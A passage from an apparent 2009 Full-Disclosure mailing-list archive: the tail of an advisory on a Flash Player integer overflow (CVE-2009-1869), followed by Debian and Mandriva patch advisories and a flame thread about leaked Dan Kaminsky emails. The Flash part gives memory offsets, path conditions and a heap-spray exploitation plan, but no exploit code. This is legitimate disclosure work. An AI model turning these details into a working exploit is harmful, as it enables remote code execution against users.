56 55 00E82050 55 55 55 55 15 55 55 D5 55 55 AD 55 77 D5 55 55 00E82060 55 55 55 55 D5 D5 BA 56 55 55 55 55 55 55 6B 55 00E82070 B5 56 55 55 57 55 55 01 00 00 00 00 00 00 00 00 00E82080 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00E82090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00E820A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00E820B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00E820C0 00 00 00 00 00 00 00 00 00 00 To make things more clear: Let 'ArbitraryObjectA' be pointed by (&OutOfBoundsObject+0x8) Let 'ArbitraryObjectB' be pointed by (&OutOfBoundsObject+0x38) In order to reach the arbitrary overwrite, the are three conditions 1) intrf_count >= 0x10000000 // in order to overflow 2) PathConditionA: ((char *)ArbitraryObjectA)[0x2e] == 1 // .text:10226D76 3) PathConditionB: ((char *)ArbitraryObjectB)[0x33c] == 0 // .text:10226D7F Given the conditions are passed, a memory DWORD overwrite of arbitrary target and value occurs: *(DWORD *)((*(DWORD *)(ArbitraryObjectA+0x1c))+0x20) = *(DWORD *)(ArbitraryObjectA+0x20) Exploitation: ============= Since the out of bounds object contains arbitrary values, the attacker may spray the heap so he/she would have control over ArbitraryObjectA and ArbitraryObjectB (they would be located at addresses which contain data controlled by the attacker). This may allow him/her to pass all aforementioned conditions and also control the value which is written in the arbitrary memory MOV and the target of it. Achieving this may allow him the execute arbitrary code. During the research of this vulnerability I?ve managed to create a functional exploit (URL of the demo can be found in the references section of this advisory) It should be denoted that the vulnerable code is wrapped by an SEH handler which doesn't crash the application on Access Violation. This means that the exploitation process may try different base addresses and offsets in case of a failure. Attack vector: ============== Lure the victim to open a malicious SWF file Impact: ======= Remote Code Execution Test Environment: ================= 1. Adobe Flash Player 10.0.22.87 2. Windows XP SP3. Identifiers: ============ 1. CVE-ID: CVE-2009-1869 2. BID: 35907 References: =========== 1. My Blog (contains the original advisory): http://roeehay.blogspot.com/ 2. Demo of the exploit: http://www.youtube.com/watch?v=wJb6a-J3i4c 3. Adobe?s advisory: http://www.adobe.com/support/security/bulletins/apsb09-10.html -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090802/0a90b8f0/attachment.html From fw at deneb.enyo.de Sun Aug 2 14:17:42 2009 From: fw at deneb.enyo.de (Florian Weimer) Date: Sun, 02 Aug 2009 15:17:42 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1848-1] New znc packages fix remote code execution Message-ID: <87ab2iz761.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1848-1 security at debian.org http://www.debian.org/security/ Florian Weimer August 02, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : znc Vulnerability : directory traversal Problem type : remote Debian-specific: no Debian Bug : 537977 It was discovered that znc, an IRC proxy, did not properly process certain DCC requests, allowing attackers to upload arbitrary files. For the old stable distribution (etch), this problem has been fixed in version 0.045-3+etch3. For the stable distribution (lenny), this problem has been fixed in version 0.058-2+lenny3. For the unstable distribution (sid), this problem has been fixed in version 0.074-1. We recommend that you upgrade your znc package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3.dsc Size/MD5 checksum: 667 933a585b14d230df9dd1a8b6ee5ad4b6 http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3.diff.gz Size/MD5 checksum: 14501 330d9e4ac7894dbfec53bf9cf1e52660 http://security.debian.org/pool/updates/main/z/znc/znc_0.045.orig.tar.gz Size/MD5 checksum: 204863 9a514b125b7514811fd03befa73cce77 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_alpha.deb Size/MD5 checksum: 863536 a49fb4cba67de68d20b9da2cd8867362 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_amd64.deb Size/MD5 checksum: 794176 ed5f4fe35ce0a2550aa16a423e100065 arm architecture (ARM) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_arm.deb Size/MD5 checksum: 906432 f49d4961b57febdbc184146bbc0aca2f hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_hppa.deb Size/MD5 checksum: 860972 659a6b3b95f80220b8c55fc54c7c1657 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_i386.deb Size/MD5 checksum: 811820 e2ed63396c2813e5e8a064ab5b4ac646 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_ia64.deb Size/MD5 checksum: 963774 37187a7fb2cc43d51e8112330311334a mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_mips.deb Size/MD5 checksum: 716040 9f206ba9ef54ff3658bbf62c5ec448b5 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_mipsel.deb Size/MD5 checksum: 714202 272cbc77e814fb6ef155e0cd33a1fcbe powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_powerpc.deb Size/MD5 checksum: 793154 84bb601bf6ebf409fbca63545b37c123 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_s390.deb Size/MD5 checksum: 735198 67f86f69500e96461d1cea10fead09a9 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/z/znc/znc_0.045-3+etch3_sparc.deb Size/MD5 checksum: 751090 1a0088824517b4f542e9589febc25536 Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3.dsc Size/MD5 checksum: 1037 93fe1b9b7bd7aeebd7b3e0c3854a477f http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3.diff.gz Size/MD5 checksum: 9628 6fd05e2dbb8e6796dcc647bd79e9d1a0 http://security.debian.org/pool/updates/main/z/znc/znc_0.058.orig.tar.gz Size/MD5 checksum: 340741 c02fd740c55d5b3a7912f7584344103e alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_alpha.deb Size/MD5 checksum: 1096456 18a4159f41d3b931b31f98b84d2fb269 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_amd64.deb Size/MD5 checksum: 1031744 bc265fa88c9bb707b67e757b63ed5853 arm architecture (ARM) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_arm.deb Size/MD5 checksum: 1152106 dbf436ac4085fa58d3d51c6f9b642c16 armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_armel.deb Size/MD5 checksum: 964084 fe6c30329c2deb11d40875b8642d3127 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_hppa.deb Size/MD5 checksum: 1164842 cf1a064e2ece7df88b9d4b9370811d8b i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_i386.deb Size/MD5 checksum: 1010412 654653749e84562db775a6dfd1ca3ebd ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_ia64.deb Size/MD5 checksum: 1183120 31579bc427d4cf4f941b3aea648740d2 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_mips.deb Size/MD5 checksum: 915526 a94198400fd7832802260953d8f10acb mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_mipsel.deb Size/MD5 checksum: 907738 b794ceddef5b50eb6ecad8b16aaff23b powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_powerpc.deb Size/MD5 checksum: 1035914 3176e289856565c20528b779b5dd5b65 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_s390.deb Size/MD5 checksum: 971812 b51b7e7bb2d2b26ac7619a2db5274def sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/z/znc/znc_0.058-2+lenny3_sparc.deb Size/MD5 checksum: 1003518 681f3ddd6b61aaae7329b3835d926978 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJKdZKTAAoJEL97/wQC1SS+81MH/04oT9CB1bDrljLTxBZ1CKLp WiTLaa1U1lbmCMdSFpAl3U5Bpc9vW0AKGXAXPRYPPfYy+zaAvHoiiWgrvblkvnMk iDh8qA38PyQShCkd7cyegCPgvTHNwzUoK5Q8d05jnEw6rjuMsaNwbuvbAsbIU3m7 a0jIz6atW+J/i3UxuEQjtO4N3QYzrzaSXlvWKyNpx2udgXKbHHlw7sjjLqrdKE55 6CVuOWBfFurikvn0IPA5U9qxyI5KwhJlZlZyLafag43+V5afdK1srO+avUXlfJvy VR+rerLV/ZOAcgFxvvzYioYT2yBrptpl0/e/92gnJE54oqBXnRlnj9AtvbPU63E= =vHUu -----END PGP SIGNATURE----- From fw at deneb.enyo.de Sun Aug 2 14:48:02 2009 From: fw at deneb.enyo.de (Florian Weimer) Date: Sun, 02 Aug 2009 15:48:02 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1849-1] New xml-security-c packages fix signature forgery Message-ID: <871vnuz5rh.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1849-1 security at debian.org http://www.debian.org/security/ Florian Weimer August 02, 2009 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : xml-security-c Vulnerability : design flaw Problem type : local (remote) Debian-specific: no CVE Id(s) : CVE-2009-0217 CERT advisory : VU#466161 It was discovered that the W3C XML Signature recommendation contains a protocol-level vulnerability related to HMAC output truncation. This update implements the proposed workaround in the C++ version of the Apache implementation of this standard, xml-security-c, by preventing truncation to output strings shorter than 80 bits or half of the original HMAC output, whichever is greater. For the old stable distribution (etch), this problem has been fixed in version 1.2.1-3+etch1. For the stable distribution (lenny), this problem has been fixed in version 1.4.0-3+lenny2. For the unstable distribution (sid), this problem has been fixed in version 1.4.0-4. We recommend that you upgrade your xml-security-c packages. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Source archives: http://security.debian.org/pool/updates/main/x/xml-security-c/xml-security-c_1.2.1.orig.tar.gz Size/MD5 checksum: 2560698 c8cfd893e0d13c08e6cdffc1b02d431c http://security.debian.org/pool/updates/main/x/xml-security-c/xml-security-c_1.2.1-3+etch1.diff.gz Size/MD5 checksum: 9397 eee96ead16c0fe740d1e323bde905830 http://security.debian.org/pool/updates/main/x/xml-security-c/xml-security-c_1.2.1-3+etch1.dsc Size/MD5 checksum: 798 7c376bd95337c43d4de11ea3a75a24f5 Architecture independent packages: http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-doc_1.2.1-3+etch1_all.deb Size/MD5 checksum: 1845748 ee0ffa05b1b60925e38f3fca562a08eb alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_alpha.deb Size/MD5 checksum: 119938 d31ec89d90362667221233b6296e4cb0 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_alpha.deb Size/MD5 checksum: 312956 b2ad9dd61644639f572f4e1bcb00965d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_amd64.deb Size/MD5 checksum: 291372 9c218c654a24213f98ba3222d8337f7a http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_amd64.deb Size/MD5 checksum: 119084 020bfb03a4736b0478d645510d86953f arm architecture (ARM) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_arm.deb Size/MD5 checksum: 304896 b6c3dcda88a74d359218f220deaea2b5 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_arm.deb Size/MD5 checksum: 120304 cd7487c6c571d6e0a002e3a2cd59e05e hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_hppa.deb Size/MD5 checksum: 121356 f138d0eecdb09e5d06760fcb897332a8 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_hppa.deb Size/MD5 checksum: 361032 f70bcaf5d4b9868fee5477c5e4681dab i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_i386.deb Size/MD5 checksum: 293276 18d5996d062d21bd6af815c80bda5b1a http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_i386.deb Size/MD5 checksum: 120864 b2a8f94634550d36369326943ed53baf ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_ia64.deb Size/MD5 checksum: 119930 c3ceb9e692852962d25e708016a7a434 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_ia64.deb Size/MD5 checksum: 350184 f15bfec431e30ada442c43be1f5a91ff mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_mips.deb Size/MD5 checksum: 119942 bae859241d611a240ae5b9249f120f38 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_mips.deb Size/MD5 checksum: 276032 7d5d2977f75703715df6f2adca648793 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_mipsel.deb Size/MD5 checksum: 119946 e1f515b9ba927eba7545f1f70d8c8d64 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_mipsel.deb Size/MD5 checksum: 266602 f498800151d86f9094b5cbefd1b7ad96 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_powerpc.deb Size/MD5 checksum: 119950 2601f8c882c496450ef12932d946e4cd http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_powerpc.deb Size/MD5 checksum: 295310 cfe7e0e8a0cc973f1d31b7c5e626b3fd s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_s390.deb Size/MD5 checksum: 119926 e22f0b7723656aa4d290e0115d68de10 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_s390.deb Size/MD5 checksum: 292112 326eff9008b42bc0a31e728a0a8bc610 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.2.1-3+etch1_sparc.deb Size/MD5 checksum: 119836 c9f19d8e98ab76ea89b41e46b11d7036 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c12_1.2.1-3+etch1_sparc.deb Size/MD5 checksum: 298112 bbbf2e5caba79d70ac1e90022bb6a9fb Debian GNU/Linux 5.0 alias lenny - -------------------------------- Source archives: http://security.debian.org/pool/updates/main/x/xml-security-c/xml-security-c_1.4.0.orig.tar.gz Size/MD5 checksum: 934876 dd9accf6727eb008dbf1dd674d5d4dcc http://security.debian.org/pool/updates/main/x/xml-security-c/xml-security-c_1.4.0-3+lenny2.dsc Size/MD5 checksum: 1378 f29c4e9daf89733b4f5351b6832d30d1 http://security.debian.org/pool/updates/main/x/xml-security-c/xml-security-c_1.4.0-3+lenny2.diff.gz Size/MD5 checksum: 6299 f9c531ccd6d81f8cdf1c3e1a14452ce9 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_alpha.deb Size/MD5 checksum: 403536 2be5f3c78a7d136343f41db631f35dbf http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_alpha.deb Size/MD5 checksum: 137174 3083a6152fe3503df12bded2d585bbac amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_amd64.deb Size/MD5 checksum: 137140 cfda58e00bc0e4d0c0659bae97e8b618 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_amd64.deb Size/MD5 checksum: 373934 df07b72b5b4c62e047771bacdb5362db arm architecture (ARM) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_arm.deb Size/MD5 checksum: 378166 d4b08d9ad7c4376d8365e77058007110 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_arm.deb Size/MD5 checksum: 138626 92c35b8c5f7e224d55f4b0d0430f616d armel architecture (ARM EABI) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_armel.deb Size/MD5 checksum: 305848 aacf870726bf8ab6ec17aaf7b0cdcfdf http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_armel.deb Size/MD5 checksum: 140072 625c396cf269bf753511744d84e63182 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_hppa.deb Size/MD5 checksum: 140120 c42442f8a13b412e76c26be15018452e http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_hppa.deb Size/MD5 checksum: 417920 7d37c2e4a92bbf6d00a6a66e0bf79ec0 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_i386.deb Size/MD5 checksum: 367904 5119c1cff8e8ca5a1e0378d6a7a993c6 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_i386.deb Size/MD5 checksum: 139746 7ac6a75066e66941c015836bf249d2d5 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_ia64.deb Size/MD5 checksum: 137162 ae3815bb28e9f541c6d465fa02ccb3ca http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_ia64.deb Size/MD5 checksum: 443176 ab99f41436d699969a99e10c9b302fb5 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_mips.deb Size/MD5 checksum: 137212 5f80e137ea0990adafcb95780c8ac40e http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_mips.deb Size/MD5 checksum: 317060 e1cfbea0ebd764a7aa0cd3e036451ba3 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_mipsel.deb Size/MD5 checksum: 137210 800e1daa075a066a3eddaf0d70109396 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_mipsel.deb Size/MD5 checksum: 307406 b1a81ab15d51331594a012128626381d powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_powerpc.deb Size/MD5 checksum: 139754 290d64a32f56eb8c937c0f980545dc92 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_powerpc.deb Size/MD5 checksum: 394974 0a743cf7c858f323e2218782164ebd88 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_s390.deb Size/MD5 checksum: 354552 a533a33dcde0fcfa971044b7937e6fde http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_s390.deb Size/MD5 checksum: 137140 19a74b4629a160c17a16e1bd68d0d12e sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c14_1.4.0-3+lenny2_sparc.deb Size/MD5 checksum: 361628 d35cd24bf41aedd439497e3bf6427466 http://security.debian.org/pool/updates/main/x/xml-security-c/libxml-security-c-dev_1.4.0-3+lenny2_sparc.deb Size/MD5 checksum: 139732 b88f0bb712cc35216fa05ae433f916d0 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) iQEcBAEBAgAGBQJKdZn9AAoJEL97/wQC1SS+XFoH/iCN4Qwy1N+78BXWdV37jPyu L5KNYp1Qfkkf/RQKKZVCqdSiyCaYp/J/JVuJvVW0eoGsxcxS5xEb8qVdX6Hn0Xwe l4h4QFsMXjHWxVLyY9H0rHFQWK3/qV3JHtN3mDpG5bA7QIzgm7zaTzaiJgV6Rdht r7rXB3Gz/WPEElZsEbxL51Cv3CQPZ6Yrwt2En9VuhU2BjlP3xhxaRWcCJT7RRJof QEPQpg0zPp9YyY1aoYrG/yE4BVecm4g5VQeXpIalNri0YSynVoTdxagd3T0izEw7 LyNXpRv/tOsjnMDwO8TNNjZS0/1z2FSRqLEW8EXxDOWwOBP4wmwJe1+xitl232c= =hORs -----END PGP SIGNATURE----- From pschmehl_lists at tx.rr.com Sun Aug 2 21:30:04 2009 From: pschmehl_lists at tx.rr.com (Paul Schmehl) Date: Sun, 02 Aug 2009 15:30:04 -0500 Subject: [Full-disclosure] Just Asking In-Reply-To: <4A74C9B6.40309@gmail.com> References: <4A74C9B6.40309@gmail.com> Message-ID: Nothing is more impressive than some anonymous twit attacking someone who does their research under their own name with stolen information they should not have to begin with and then selectively publishing only that which bolsters their supposed case. --On August 2, 2009 12:03:18 AM +0100 Ew0k wrote: > A friend of mine observed something that I believe should be put on the > table. > While reading the e-mails sent back and forth by Dan Kaminsky, illegally > published on zf05 one of the e-mails caught his eye: > > """ > > Dan, > > > This is another of our clients and you do not have the permission of the > client to perform this kind of scanning. > You have triggered over 22,000 events for us in this range alone as well > as caused a few other minor aggravations. > While you may believe you are a researcher and doing good, performing > your unauthorized testing on live production platforms is a reportable > offense. > I am going to kindly suggest you seek permission from various targets > before you continue your "research". > Please note I am under contractual obligations to report your > activities, we have recorded your "scans" on over 26 devices globally > and none of our clients have given you permission to perform these > "tests" > > """ > > Now, according to this e-mail should Dan's CISSP certification be > revised? Paul Schmehl, If it isn't already obvious, my opinions are my own and not those of my employer. ****************************************** WARNING: Check the headers before replying From security at mandriva.com Sun Aug 2 23:21:00 2009 From: security at mandriva.com (security at mandriva.com) Date: Mon, 03 Aug 2009 00:21:00 +0200 Subject: [Full-disclosure] [ MDVSA-2009:190 ] OpenEXR Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2009:190 http://www.mandriva.com/security/ _______________________________________________________________________ Package : OpenEXR Date : August 2, 2009 Affected: 2008.1, 2009.0, 2009.1, Enterprise Server 5.0 _______________________________________________________________________ Problem Description: Multiple vulnerabilities has been found and corrected in OpenEXR: Multiple integer overflows in OpenEXR 1.2.2 and 1.6.1 allow context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors that trigger heap-based buffer overflows, related to (1) the Imf::PreviewImage::PreviewImage function and (2) compressor constructors. NOTE: some of these details are obtained from third party information (CVE-2009-1720). The decompression implementation in the Imf::hufUncompress function in OpenEXR 1.2.2 and 1.6.1 allows context-dependent attackers to cause a denial of service (application crash) or possibly execute arbitrary code via vectors that trigger a free of an uninitialized pointer (CVE-2009-1721). This update provides fixes for these vulnerabilities. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1720 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1721 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.1: c94b1eaaaf8fe5e56a24e756714d8335 2008.1/i586/libOpenEXR6-1.6.1-1.1mdv2008.1.i586.rpm 2b7f464f53e3cb796c973fc68fdd1313 2008.1/i586/libOpenEXR-devel-1.6.1-1.1mdv2008.1.i586.rpm fc720240681bc36252ec968e3d87d5fc 2008.1/i586/OpenEXR-1.6.1-1.1mdv2008.1.i586.rpm 2db8228f2f29c2569e82bb2e9061062e 2008.1/SRPMS/OpenEXR-1.6.1-1.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 77a42846f0e41391ddf5988c8f484535 2008.1/x86_64/lib64OpenEXR6-1.6.1-1.1mdv2008.1.x86_64.rpm f1ff4b1300c22ca3f37ff09b40f3b997 2008.1/x86_64/lib64OpenEXR-devel-1.6.1-1.1mdv2008.1.x86_64.rpm f146ec3ee2520afad1666ff4b5a81793 2008.1/x86_64/OpenEXR-1.6.1-1.1mdv2008.1.x86_64.rpm 2db8228f2f29c2569e82bb2e9061062e 2008.1/SRPMS/OpenEXR-1.6.1-1.1mdv2008.1.src.rpm Mandriva Linux 2009.0: dcd12124019ac7ba462c1fb195cd52bb 2009.0/i586/libOpenEXR6-1.6.1-3.1mdv2009.0.i586.rpm 6fde13106a7d60ed4703d4cbfb2ea653 2009.0/i586/libOpenEXR-devel-1.6.1-3.1mdv2009.0.i586.rpm 7db031f2573d1e24597582d227501d0c 2009.0/i586/OpenEXR-1.6.1-3.1mdv2009.0.i586.rpm d7248b8c2af50851bdfeeb1c76cf6cd8 2009.0/SRPMS/OpenEXR-1.6.1-3.1mdv2009.0.src.rpm Mandriva Linux 2009.0/X86_64: a853391ab9f3ea00ffa5aaaf1033a2e9 2009.0/x86_64/lib64OpenEXR6-1.6.1-3.1mdv2009.0.x86_64.rpm 242cf037920faffc237834f99b16e97b 2009.0/x86_64/lib64OpenEXR-devel-1.6.1-3.1mdv2009.0.x86_64.rpm 48de61eb25fbb97cf594f710a5b5650b 2009.0/x86_64/OpenEXR-1.6.1-3.1mdv2009.0.x86_64.rpm d7248b8c2af50851bdfeeb1c76cf6cd8 2009.0/SRPMS/OpenEXR-1.6.1-3.1mdv2009.0.src.rpm Mandriva Linux 2009.1: fae5bd98e4a58ce9e39738004a624d0c 2009.1/i586/libOpenEXR6-1.6.1-3.1mdv2009.1.i586.rpm b1019fd0d3a9ff9ba462c1b7d85e54d4 2009.1/i586/libOpenEXR-devel-1.6.1-3.1mdv2009.1.i586.rpm 9aca18bddc1a70b20617710818ccbf20 2009.1/i586/OpenEXR-1.6.1-3.1mdv2009.1.i586.rpm 37e18b8c3ba08c126c28fb776f399bd9 2009.1/SRPMS/OpenEXR-1.6.1-3.1mdv2009.1.src.rpm Mandriva Linux 2009.1/X86_64: 625e746ac99f3c012f27fa4fff5b9c9d 2009.1/x86_64/lib64OpenEXR6-1.6.1-3.1mdv2009.1.x86_64.rpm bb1bb1a08dd44c2e3be5d46ecdb78fdc 2009.1/x86_64/lib64OpenEXR-devel-1.6.1-3.1mdv2009.1.x86_64.rpm 9ed6f66f1f14539eca8c81a41aaa5e10 2009.1/x86_64/OpenEXR-1.6.1-3.1mdv2009.1.x86_64.rpm 37e18b8c3ba08c126c28fb776f399bd9 2009.1/SRPMS/OpenEXR-1.6.1-3.1mdv2009.1.src.rpm Mandriva Enterprise Server 5: 5c6990ef802a3069b8b5771978a03254 mes5/i586/libOpenEXR6-1.6.1-3.1mdvmes5.i586.rpm 112136f52f9ce364bb9dd29cf2461581 mes5/i586/libOpenEXR-devel-1.6.1-3.1mdvmes5.i586.rpm 4e2b49754f9b399825a94d06b6366030 mes5/i586/OpenEXR-1.6.1-3.1mdvmes5.i586.rpm ed0d0f51d77ced65473c17f947357dc1 mes5/SRPMS/OpenEXR-1.6.1-3.1mdvmes5.src.rpm Mandriva Enterprise Server 5/X86_64: f084d1197a55203bf84ebe0e238d351e mes5/x86_64/lib64OpenEXR6-1.6.1-3.1mdvmes5.x86_64.rpm 36b3d8348cbc0532e729a00844232366 mes5/x86_64/lib64OpenEXR-devel-1.6.1-3.1mdvmes5.x86_64.rpm 